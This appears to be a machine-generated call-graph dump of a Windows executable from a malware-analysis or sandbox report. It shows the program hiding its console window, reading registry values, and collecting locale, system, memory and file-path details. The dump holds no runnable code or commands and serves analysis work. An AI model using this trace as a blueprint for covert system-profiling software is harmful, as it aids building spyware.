??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3776 7ff71e3975cc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3776->3775 3777->3775 3777->3776 3778 7ff71e3988f0 10 API calls 3777->3778 3779 7ff71e3975bf fclose 3778->3779 3779->3776 3780 7ff71e398870 3785 7ff71e398120 3780->3785 3782 7ff71e398884 3783 7ff71e398896 3782->3783 3784 7ff71e39b500 _Receive_impl free 3782->3784 3784->3783 3786 7ff71e398177 3785->3786 3788 7ff71e398141 3785->3788 3787 7ff71e3981c0 3786->3787 3789 7ff71e3981fd _invalid_parameter_noinfo_noreturn 3786->3789 3791 7ff71e3981b8 3786->3791 3787->3782 3788->3789 3790 7ff71e39b500 _Receive_impl free 3788->3790 3793 7ff71e398254 3789->3793 3794 7ff71e398223 3789->3794 3790->3786 3792 7ff71e39b500 _Receive_impl free 3791->3792 3792->3787 3793->3782 3795 7ff71e39824c 3794->3795 3797 7ff71e39826b _invalid_parameter_noinfo_noreturn 3794->3797 3796 7ff71e39b500 _Receive_impl free 3795->3796 3796->3793 3627 7ff71e391170 __std_exception_copy 3870 7ff71e396ef0 3871 7ff71e396f27 3870->3871 3873 7ff71e396fa2 fgetc 3871->3873 3874 7ff71e396fbe fgetc 3871->3874 3875 7ff71e396f37 3871->3875 3872 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3876 7ff71e3971ab 3872->3876 3873->3875 3880 7ff71e3970f0 3874->3880 3881 7ff71e396feb 3874->3881 3875->3872 3877 7ff71e39702a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3877->3881 3879 7ff71e397198 3882 7ff71e39b500 _Receive_impl free 3879->3882 3880->3875 3880->3879 3883 7ff71e39712f _invalid_parameter_noinfo_noreturn 3880->3883 3881->3877 3881->3880 3884 7ff71e39709d memcpy fgetc 3881->3884 3886 7ff71e39714e 3881->3886 3887 7ff71e39a570 3881->3887 3882->3875 3883->3880 3884->3880 3884->3881 3885 7ff71e397170 ungetc 3885->3880 3885->3886 3886->3880 3886->3885 3888 7ff71e39a6c5 3887->3888 3905 7ff71e391310 ?_Xlength_error@std@@YAXPEBD 3888->3905 3906 7ff71e3974f0 3907 7ff71e397503 3906->3907 3908 7ff71e3974fc _unlock_file 3906->3908 3908->3907 3628 7ff71e399974 3629 7ff71e399982 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3628->3629 3630 7ff71e3999b2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3629->3630 3631 7ff71e3999bc 3629->3631 3630->3631 3632 7ff71e39cf76 3633 7ff71e39cfab __current_exception __current_exception_context terminate 3632->3633 3634 7ff71e39cf9f 3632->3634 3633->3634 3909 7ff71e39bae8 3912 7ff71e39c1bc 3909->3912 3913 7ff71e39c1df GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3912->3913 3914 7ff71e39baf1 3912->3914 3913->3914 3243 7ff71e39b96c 3244 7ff71e39b985 3243->3244 3245 7ff71e39bac3 3244->3245 3246 7ff71e39b98d __scrt_acquire_startup_lock 3244->3246 3431 7ff71e39bfac IsProcessorFeaturePresent 3245->3431 3248 7ff71e39bacd 3246->3248 3253 7ff71e39b9ab __scrt_release_startup_lock 3246->3253 3249 7ff71e39bfac 9 API calls 3248->3249 3250 7ff71e39bad8 3249->3250 3252 7ff71e39bae0 _exit 3250->3252 3251 7ff71e39b9d0 3253->3251 3254 7ff71e39ba56 _get_initial_narrow_environment __p___argv __p___argc 3253->3254 3257 7ff71e39ba4e _register_thread_local_exe_atexit_callback 3253->3257 3263 7ff71e395d80 GetConsoleWindow ShowWindow 3254->3263 3257->3254 3260 7ff71e39ba83 3261 7ff71e39ba88 _cexit 3260->3261 3262 7ff71e39ba8d 3260->3262 3261->3262 3262->3251 3437 7ff71e399610 3263->3437 3265 7ff71e395e03 3441 7ff71e394a40 3265->3441 3269 7ff71e395e1a 3270 7ff71e395e5b 3269->3270 3271 7ff71e395e56 3269->3271 3273 7ff71e395e4f _invalid_parameter_noinfo_noreturn 3269->3273 3272 7ff71e399610 memcpy 3270->3272 3563 7ff71e39b500 3271->3563 3275 7ff71e395e71 3272->3275 3273->3271 3490 7ff71e394640 GetLocaleInfoA 3275->3490 3278 7ff71e3983c0 memcpy 3279 7ff71e395e88 3278->3279 3280 7ff71e395ec9 3279->3280 3281 7ff71e395ec4 3279->3281 3283 7ff71e395ebd _invalid_parameter_noinfo_noreturn 3279->3283 3282 7ff71e399610 memcpy 3280->3282 3284 7ff71e39b500 _Receive_impl free 3281->3284 3285 7ff71e395edf 3282->3285 3283->3281 3284->3280 3526 7ff71e393560 GetSystemInfo memset 3285->3526 3288 7ff71e3983c0 memcpy 3289 7ff71e395ef6 3288->3289 3290 7ff71e395f37 3289->3290 3292 7ff71e395f32 3289->3292 3294 7ff71e395f2b _invalid_parameter_noinfo_noreturn 3289->3294 3291 7ff71e399610 memcpy 3290->3291 3293 7ff71e395f4d GlobalMemoryStatusEx memset 3291->3293 3295 7ff71e39b500 _Receive_impl free 3292->3295 3543 7ff71e396810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3293->3543 3294->3292 3295->3290 3297 7ff71e395f7a 3544 7ff71e3999f0 3297->3544 3300 7ff71e3999f0 9 API calls 3301 7ff71e395faf 3300->3301 3302 7ff71e396048 3301->3302 3566 7ff71e3996c0 3301->3566 3558 7ff71e397c10 3302->3558 3305 7ff71e396078 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3306 7ff71e3983c0 memcpy 3305->3306 3307 7ff71e39609e 3306->3307 3308 7ff71e3960dc 3307->3308 3310 7ff71e39676e _invalid_parameter_noinfo_noreturn 3307->3310 3311 7ff71e39b500 _Receive_impl free 3307->3311 3309 7ff71e399610 memcpy 3308->3309 3312 7ff71e3960f2 3309->3312 3313 7ff71e396775 3310->3313 3311->3308 3314 7ff71e393780 48 API calls 3312->3314 3316 7ff71e39b500 _Receive_impl free 3313->3316 3315 7ff71e3960fc 3314->3315 3317 7ff71e3983c0 memcpy 3315->3317 3318 7ff71e39677a 3316->3318 3319 7ff71e396109 3317->3319 3320 7ff71e3967cc 3318->3320 3322 7ff71e3967c7 3318->3322 3325 7ff71e3967c0 _invalid_parameter_noinfo_noreturn 3318->3325 3321 7ff71e39614a 3319->3321 3324 7ff71e396145 3319->3324 3329 7ff71e39613e _invalid_parameter_noinfo_noreturn 3319->3329 3323 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3320->3323 3326 7ff71e399610 memcpy 3321->3326 3327 7ff71e39b500 _Receive_impl free 3322->3327 3328 7ff71e3967dd 3323->3328 3330 7ff71e39b500 _Receive_impl free 3324->3330 3325->3322 3331 7ff71e396160 3326->3331 3327->3320 3429 7ff71e39c0fc GetModuleHandleW 3328->3429 3329->3324 3330->3321 3332 7ff71e393aa0 38 API calls 3331->3332 3333 7ff71e39616a 3332->3333 3334 7ff71e3983c0 memcpy 3333->3334 3335 7ff71e396177 3334->3335 3336 7ff71e3961b8 3335->3336 3337 7ff71e3961b3 3335->3337 3339 7ff71e3961ac _invalid_parameter_noinfo_noreturn 3335->3339 3338 7ff71e394e50 28 API calls 3336->3338 3340 7ff71e39b500 _Receive_impl free 3337->3340 3341 7ff71e3961c1 3338->3341 3339->3337 3340->3336 3342 7ff71e3967fe 3341->3342 3349 7ff71e3961e0 3341->3349 3344 7ff71e391310 ?_Xlength_error@std@@YAXPEBD 3342->3344 3343 7ff71e396288 memcpy 3346 7ff71e399610 memcpy 3343->3346 3345 7ff71e396803 3344->3345 3352 7ff71e391270 Concurrency::cancel_current_task __std_exception_copy 3345->3352 3348 7ff71e3962d9 3346->3348 3347 7ff71e39621b 3354 7ff71e39b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3347->3354 3353 7ff71e3983c0 memcpy 3348->3353 3349->3343 3349->3347 3350 7ff71e39627c 3349->3350 3351 7ff71e39626d 3349->3351 3358 7ff71e396234 3349->3358 3356 7ff71e39b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3350->3356 3351->3345 3351->3347 3355 7ff71e396809 3352->3355 3357 7ff71e39630b 3353->3357 3354->3358 3356->3358 3359 7ff71e39634c 3357->3359 3363 7ff71e396347 3357->3363 3367 7ff71e396340 _invalid_parameter_noinfo_noreturn 3357->3367 3358->3343 3360 7ff71e39637f _invalid_parameter_noinfo_noreturn 3358->3360 3359->3360 3361 7ff71e39638b 3359->3361 3362 7ff71e396386 3359->3362 3360->3362 3366 7ff71e399610 memcpy 3361->3366 3365 7ff71e39b500 _Receive_impl free 3362->3365 3364 7ff71e39b500 _Receive_impl free 3363->3364 3364->3359 3365->3361 3368 7ff71e3963a1 3366->3368 3367->3363 3369 7ff71e393cd0 59 API calls 3368->3369 3370 7ff71e3963ab 3369->3370 3371 7ff71e3983c0 memcpy 3370->3371 3372 7ff71e3963b8 3371->3372 3373 7ff71e3963f9 3372->3373 3374 7ff71e3963f4 3372->3374 3376 7ff71e3963ed _invalid_parameter_noinfo_noreturn 3372->3376 3375 7ff71e399610 memcpy 3373->3375 3377 7ff71e39b500 _Receive_impl free 3374->3377 3378 7ff71e39640f 3375->3378 3376->3374 3377->3373 3379 7ff71e393f60 58 API calls 3378->3379 3380 7ff71e396419 3379->3380 3381 7ff71e3983c0 memcpy 3380->3381 3382 7ff71e396426 3381->3382 3383 7ff71e396467 3382->3383 3385 7ff71e396462 3382->3385 3387 7ff71e39645b _invalid_parameter_noinfo_noreturn 3382->3387 3384 7ff71e394180 58 API calls 3383->3384 3386 7ff71e396471 3384->3386 3388 7ff71e39b500 _Receive_impl free 3385->3388 3389 7ff71e3983c0 memcpy 3386->3389 3387->3385 3388->3383 3390 7ff71e39647e 3389->3390 3391 7ff71e3964bf memset 3390->3391 3392 7ff71e3964ba 3390->3392 3394 7ff71e3964b3 _invalid_parameter_noinfo_noreturn 3390->3394 3393 7ff71e396810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3391->3393 3395 7ff71e39b500 _Receive_impl free 3392->3395 3396 7ff71e3964d9 GetModuleFileNameA 3393->3396 3394->3392 3395->3391 3397 7ff71e3999f0 9 API calls 3396->3397 3398 7ff71e3964ff 3397->3398 3399 7ff71e3999f0 9 API calls 3398->3399 3400 7ff71e39650e 3399->3400 3401 7ff71e3999f0 9 API calls 3400->3401 3402 7ff71e39651d 3401->3402 3403 7ff71e3965b6 3402->3403 3404 7ff71e3996c0 8 API calls 3402->3404 3405 7ff71e397c10 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3403->3405 3404->3403 3406 7ff71e3965df ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3405->3406 3407 7ff71e3983c0 memcpy 3406->3407 3408 7ff71e396605 3407->3408 3409 7ff71e396643 3408->3409 3411 7ff71e39672c _invalid_parameter_noinfo_noreturn 3408->3411 3412 7ff71e39b500 _Receive_impl free 3408->3412 3410 7ff71e399610 memcpy 3409->3410 3413 7ff71e396659 3410->3413 3415 7ff71e396733 3411->3415 3412->3409 3414 7ff71e394390 42 API calls 3413->3414 3416 7ff71e396663 3414->3416 3417 7ff71e39b500 _Receive_impl free 3415->3417 3418 7ff71e3983c0 memcpy 3416->3418 3421 7ff71e39673b 3417->3421 3419 7ff71e396670 3418->3419 3420 7ff71e3966b1 3419->3420 3423 7ff71e3966ac 3419->3423 3426 7ff71e3966a5 _invalid_parameter_noinfo_noreturn 3419->3426 3422 7ff71e395510 51 API calls 3420->3422 3421->3310 3421->3313 3421->3318 3425 7ff71e3966c7 3422->3425 3424 7ff71e39b500 _Receive_impl free 3423->3424 3424->3420 3427 7ff71e391b50 175 API calls 3425->3427 3426->3423 3428 7ff71e3966ea 3427->3428 3428->3411 3428->3415 3428->3421 3430 7ff71e39ba7f 3429->3430 3430->3250 3430->3260 3432 7ff71e39bfd2 3431->3432 3433 7ff71e39bfe0 memset RtlCaptureContext RtlLookupFunctionEntry 3432->3433 3434 7ff71e39c056 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3433->3434 3435 7ff71e39c01a RtlVirtualUnwind 3433->3435 3436 7ff71e39c0d6 3434->3436 3435->3434 3436->3248 3438 7ff71e399672 3437->3438 3439 7ff71e399633 memcpy 3437->3439 3438->3265 3439->3265 3586 7ff71e39c530 3441->3586 3445 7ff71e394af1 RegOpenKeyExA 3446 7ff71e394b97 RegOpenKeyExA 3445->3446 3447 7ff71e394b1d RegGetValueA 3445->3447 3448 7ff71e394bc2 RegGetValueA 3446->3448 3449 7ff71e394c3c RegOpenKeyExA 3446->3449 3450 7ff71e394b84 RegCloseKey 3447->3450 3451 7ff71e394b56 3447->3451 3452 7ff71e394c29 RegCloseKey 3448->3452 3453 7ff71e394bfb 3448->3453 3454 7ff71e394c6b RegGetValueA 3449->3454 3467 7ff71e394d4c 3449->3467 3450->3446 3455 7ff71e3999f0 9 API calls 3451->3455 3452->3449 3456 7ff71e3999f0 9 API calls 3453->3456 3457 7ff71e394cd2 RegGetValueA 3454->3457 3458 7ff71e394ca4 3454->3458 3459 7ff71e394b66 3455->3459 3462 7ff71e394c0b 3456->3462 3460 7ff71e394d39 RegCloseKey 3457->3460 3461 7ff71e394d0b 3457->3461 3463 7ff71e3999f0 9 API calls 3458->3463 3464 7ff71e3999f0 9 API calls 3459->3464 3460->3467 3468 7ff71e3999f0 9 API calls 3461->3468 3469 7ff71e3999f0 9 API calls 3462->3469 3465 7ff71e394cb4 3463->3465 3466 7ff71e394b75 3464->3466 3470 7ff71e3999f0 9 API calls 3465->3470 3471 7ff71e3999f0 9 API calls 3466->3471 3472 7ff71e394dd9 3467->3472 3476 7ff71e3996c0 8 API calls 3467->3476 3473 7ff71e394d1b 3468->3473 3474 7ff71e394c1a 3469->3474 3475 7ff71e394cc3 3470->3475 3471->3450 3477 7ff71e397c10 _Receive_impl 3 API calls 3472->3477 3478 7ff71e3999f0 9 API calls 3473->3478 3479 7ff71e3999f0 9 API calls 3474->3479 3480 7ff71e3999f0 9 API calls 3475->3480 3476->3472 3481 7ff71e394e0b ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3477->3481 3482 7ff71e394d2a 3478->3482 3479->3452 3480->3457 3483 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3481->3483 3484 7ff71e3999f0 9 API calls 3482->3484 3485 7ff71e394e31 3483->3485 3484->3460 3486 7ff71e3983c0 3485->3486 3488 7ff71e3983d7 3486->3488 3487 7ff71e398433 3487->3269 3488->3487 3489 7ff71e39840a memcpy 3488->3489 3489->3269 3491 7ff71e3946a2 3490->3491 3492 7ff71e3946c7 3490->3492 3589 7ff71e39a0c0 3491->3589 3495 7ff71e39a0c0 7 API calls 3492->3495 3494 7ff71e3946c2 3497 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3494->3497 3496 7ff71e3946ff GetLocaleInfoA 3495->3496 3498 7ff71e3947b0 3496->3498 3499 7ff71e394728 3496->3499 3500 7ff71e394797 3497->3500 3502 7ff71e39a0c0 7 API calls 3498->3502 3501 7ff71e39a0c0 7 API calls 3499->3501 3500->3278 3522 7ff71e394748 3501->3522 3503 7ff71e3947e3 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3502->3503 3505 7ff71e3999f0 9 API calls 3503->3505 3504 7ff71e394780 3507 7ff71e39b500 _Receive_impl free 3504->3507 3508 7ff71e39487e 3505->3508 3506 7ff71e394a33 _invalid_parameter_noinfo_noreturn 3507->3494 3606 7ff71e39b250 3508->3606 3511 7ff71e3999f0 9 API calls 3512 7ff71e3948a9 3511->3512 3513 7ff71e39b250 9 API calls 3512->3513 3514 7ff71e3948c7 3513->3514 3515 7ff71e3999f0 9 API calls 3514->3515 3516 7ff71e3948d6 3515->3516 3517 7ff71e394963 3516->3517 3518 7ff71e3996c0 8 API calls 3516->3518 3519 7ff71e397c10 _Receive_impl 3 API calls 3517->3519 3518->3517 3520 7ff71e39498c ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3519->3520 3521 7ff71e3949ac 3520->3521 3520->3522 3523 7ff71e3949dc 3521->3523 3524 7ff71e3949d5 _invalid_parameter_noinfo_noreturn 3521->3524 3522->3494 3522->3504 3522->3506 3525 7ff71e39b500 _Receive_impl free 3523->3525 3524->3523 3525->3522 3621 7ff71e396810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3526->3621 3528 7ff71e3935be 3529 7ff71e3999f0 9 API calls 3528->3529 3530 7ff71e3935cf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3529->3530 3531 7ff71e3999f0 9 API calls 3530->3531 3532 7ff71e3935ec 3531->3532 3533 7ff71e3999f0 9 API calls 3532->3533 3534 7ff71e3935fc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3533->3534 3535 7ff71e3999f0 9 API calls 3534->3535 3536 7ff71e393618 3535->3536 3537 7ff71e3936a6 3536->3537 3538 7ff71e3996c0 8 API calls 3536->3538 3539 7ff71e397c10 _Receive_impl 3 API calls 3537->3539 3538->3537 3540 7ff71e3936d8 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3539->3540 3541 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3540->3541 3542 7ff71e3936fe 3541->3542 3542->3288 3543->3297 3547 7ff71e399a20 ?good@ios_base@std@ 3544->3547 3546 7ff71e399a73 3550 7ff71e399a89 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3546->3550 3551 7ff71e399aa1 3546->3551 3547->3546 3547->3551 3549 7ff71e399afd ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3552 7ff71e399aab ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3549->3552 3553 7ff71e399b1a 3549->3553 3550->3551 3551->3549 3551->3552 3556 7ff71e399ad5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3551->3556 3554 7ff71e395f94 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3552->3554 3555 7ff71e399b8d ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3552->3555 3553->3552 3557 7ff71e399b25 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3553->3557 3554->3300 3555->3554 3556->3551 3556->3552 3557->3552 3557->3553 3559 7ff71e397c7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3558->3559 3561 7ff71e397c29 3558->3561 3560 7ff71e397cc0 _invalid_parameter_noinfo_noreturn 3559->3560 3561->3560 3562 7ff71e39b500 _Receive_impl free 3561->3562 3562->3559 3564 7ff71e39bc7c free 3563->3564 3567 7ff71e3996dd memcpy 3566->3567 3573 7ff71e399707 3566->3573 3567->3302 3569 7ff71e39980c 3622 7ff71e391310 ?_Xlength_error@std@@YAXPEBD 3569->3622 3571 7ff71e399811 3575 7ff71e391270 Concurrency::cancel_current_task __std_exception_copy 3571->3575 3572 7ff71e39b508 std::_Facet_Register 3 API calls 3574 7ff71e399753 3572->3574 3573->3569 3573->3574 3577 7ff71e399761 3573->3577 3578 7ff71e399799 3573->3578 3576 7ff71e3997a1 memcpy 3574->3576 3579 7ff71e399805 _invalid_parameter_noinfo_noreturn 3574->3579 3580 7ff71e399817 3575->3580 3582 7ff71e3997ef 3576->3582 3583 7ff71e3997c2 3576->3583 3577->3571 3577->3572 3581 7ff71e39b508 std::_Facet_Register 3 API calls 3578->3581 3579->3569 3581->3574 3582->3302 3583->3579 3584 7ff71e3997e7 3583->3584 3585 7ff71e39b500 _Receive_impl free 3584->3585 3585->3582 3587 7ff71e394a5d memset memset memset memset memset 3586->3587 3588 7ff71e396810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3587->3588 3588->3445 3590 7ff71e39a1b0 3589->3590 3591 7ff71e39a0e6 3589->3591 3620 7ff71e391310 ?_Xlength_error@std@@YAXPEBD 3590->3620 3592 7ff71e39a0ec memcpy 3591->3592 3600 7ff71e39a10b 3591->3600 3592->3494 3594 7ff71e39a1b5 3598 7ff71e391270 Concurrency::cancel_current_task __std_exception_copy 3594->3598 3595 7ff71e39a11c 3597 7ff71e39b508 std::_Facet_Register 3 API calls 3595->3597 3596 7ff71e39a137 memcpy 3596->3494 3602 7ff71e39a132 3597->3602 3603 7ff71e39a1bb 3598->3603 3600->3594 3600->3595 3600->3596 3601 7ff71e39a17c 3600->3601 3604 7ff71e39b508 std::_Facet_Register 3 API calls 3601->3604 3602->3596 3605 7ff71e39a175 _invalid_parameter_noinfo_noreturn 3602->3605 3604->3596 3605->3601 3610 7ff71e39b286 ?good@ios_base@std@ 3606->3610 3608 7ff71e39b2ed 3611 7ff71e39b2f7 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3608->3611 3614 7ff71e39b347 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3608->3614 3616 7ff71e39b31b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3608->3616 3609 7ff71e39b2bf 3609->3608 3612 7ff71e39b2d5 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3609->3612 3610->3608 3610->3609 3615 7ff71e39b3d1 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3611->3615 3618 7ff71e39489a 3611->3618 3612->3608 3614->3611 3617 7ff71e39b337 3614->3617 3615->3618 3616->3608 3616->3617 3617->3611 3619 7ff71e39b369 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3617->3619 3618->3511 3619->3611 3619->3617 3621->3528 3708 7ff71e39cfed _seh_filter_exe 3177 7ff71e391000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3181 7ff71e39b508 3177->3181 3180 7ff71e3910f2 3182 7ff71e39b522 malloc 3181->3182 3183 7ff71e39b513 3182->3183 3184 7ff71e39107b ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3182->3184 3183->3182 3185 7ff71e39b532 3183->3185 3184->3180 3186 7ff71e39b53d 3185->3186 3190 7ff71e39bca4 3185->3190 3193 7ff71e391270 3186->3193 3189 7ff71e39b543 3196 7ff71e39bc84 3190->3196 3192 7ff71e39bcb2 _CxxThrowException 3194 7ff71e39127e Concurrency::cancel_current_task 3193->3194 3195 7ff71e39128f __std_exception_copy 3194->3195 3195->3189 3196->3192 3916 7ff71e397d00 3919 7ff71e397d3b 3916->3919 3917 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3918 7ff71e397e5a 3917->3918 3919->3917 3802 7ff71e39c67c 3803 7ff71e39c68f 3802->3803 3804 7ff71e39c69c 3802->3804 3805 7ff71e398450 2 API calls 3803->3805 3805->3804 3710 7ff71e39cdfe ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 3642 7ff71e398790 3643 7ff71e397c10 _Receive_impl 3 API calls 3642->3643 3644 7ff71e3987e1 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3643->3644 3645 7ff71e3987fa 3644->3645 3646 7ff71e39880b 3644->3646 3647 7ff71e39b500 _Receive_impl free 3645->3647 3647->3646 3711 7ff71e39c610 3712 7ff71e39b500 _Receive_impl free 3711->3712 3713 7ff71e39c627 3712->3713 3648 7ff71e396990 3649 7ff71e3969d0 3648->3649 3650 7ff71e3969a3 3648->3650 3650->3649 3651 7ff71e3969b3 fflush 3650->3651 3714 7ff71e397610 3715 7ff71e397621 3714->3715 3716 7ff71e39764e 3714->3716 3717 7ff71e397646 3715->3717 3718 7ff71e397661 _invalid_parameter_noinfo_noreturn 3715->3718 3719 7ff71e39b500 _Receive_impl free 3717->3719 3720 7ff71e39767e 3718->3720 3719->3716 3721 7ff71e397a10 3722 7ff71e397a3d 3721->3722 3725 7ff71e397a38 3721->3725 3723 7ff71e397af7 3724 7ff71e39b508 std::_Facet_Register 3 API calls 3723->3724 3731 7ff71e397aab 3724->3731 3725->3722 3725->3723 3726 7ff71e397ab9 3725->3726 3729 7ff71e397ac6 3725->3729 3725->3731 3728 7ff71e397c03 3726->3728 3726->3729 3727 7ff71e397b10 memcpy 3736 7ff71e397b4b 3727->3736 3732 7ff71e391270 Concurrency::cancel_current_task __std_exception_copy 3728->3732 3729->3722 3730 7ff71e39b508 std::_Facet_Register 3 API calls 3729->3730 3730->3731 3731->3727 3733 7ff71e397bde _invalid_parameter_noinfo_noreturn 3731->3733 3734 7ff71e397c08 3732->3734 3733->3722 3735 7ff71e397bb0 3737 7ff71e39b500 _Receive_impl free 3735->3737 3736->3722 3736->3733 3736->3735 3737->3722 3920 7ff71e397510 3921 7ff71e397523 3920->3921 3922 7ff71e39751c _lock_file 3920->3922 3922->3921 3806 7ff71e39c494 3807 7ff71e39c4cc __GSHandlerCheckCommon 3806->3807 3808 7ff71e39c4f8 3807->3808 3809 7ff71e39c4e7 __CxxFrameHandler4 3807->3809 3809->3808 3652 7ff71e39c988 3653 7ff71e39c9a8 3652->3653 3654 7ff71e39c99b 3652->3654 3656 7ff71e398450 3654->3656 3657 7ff71e39848f 3656->3657 3658 7ff71e398463 3656->3658 3657->3653 3659 7ff71e398487 3658->3659 3660 7ff71e3984a8 _invalid_parameter_noinfo_noreturn 3658->3660 3661 7ff71e39b500 _Receive_impl free 3659->3661 3661->3657 3810 7ff71e39b888 3811 7ff71e39b898 3810->3811 3823 7ff71e39b68c 3811->3823 3813 7ff71e39b91f 3814 7ff71e39bfac 9 API calls 3813->3814 3822 7ff71e39b92d 3813->3822 3815 7ff71e39b93d 3814->3815 3816 7ff71e39b8bc _RTC_Initialize 3816->3813 3831 7ff71e39c270 InitializeSListHead 3816->3831 3824 7ff71e39b6cf 3823->3824 3825 7ff71e39b69d 3823->3825 3824->3816 3826 7ff71e39b70c 3825->3826 3829 7ff71e39b6a2 __scrt_release_startup_lock 3825->3829 3827 7ff71e39bfac 9 API calls 3826->3827 3828 7ff71e39b716 3827->3828 3829->3824 3830 7ff71e39b6bf _initialize_onexit_table 3829->3830 3830->3824 3832 7ff71e39ce88 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3197 7ff71e396da0 3198 7ff71e396dc2 3197->3198 3199 7ff71e396db7 3197->3199 3200 7ff71e396dd8 3198->3200 3201 7ff71e396dc9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3198->3201 3202 7ff71e396e32 3200->3202 3203 7ff71e396dfd memcpy 3200->3203 3201->3200 3204 7ff71e396ece 3202->3204 3205 7ff71e396eae 3202->3205 3207 7ff71e396e80 fread 3202->3207 3203->3202 3205->3204 3206 7ff71e396eb3 fread 3205->3206 3206->3204 3207->3202 3207->3204 3662 7ff71e393720 3663 7ff71e397c10 _Receive_impl 3 API calls 3662->3663 3664 7ff71e393762 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3663->3664 3841 7ff71e391220 __std_exception_destroy 3927 7ff71e39ba9a 3928 7ff71e39c0fc GetModuleHandleW 3927->3928 3929 7ff71e39baa1 3928->3929 3930 7ff71e39bae0 _exit 3929->3930 3931 7ff71e39baa5 3929->3931 3842 7ff71e39d01c 3844 7ff71e39d024 3842->3844 3843 7ff71e39d071 3844->3843 3845 7ff71e39b500 _Receive_impl free 3844->3845 3845->3844 3665 7ff71e39cf30 ??1_Lockit@std@@QEAA 3846 7ff71e398830 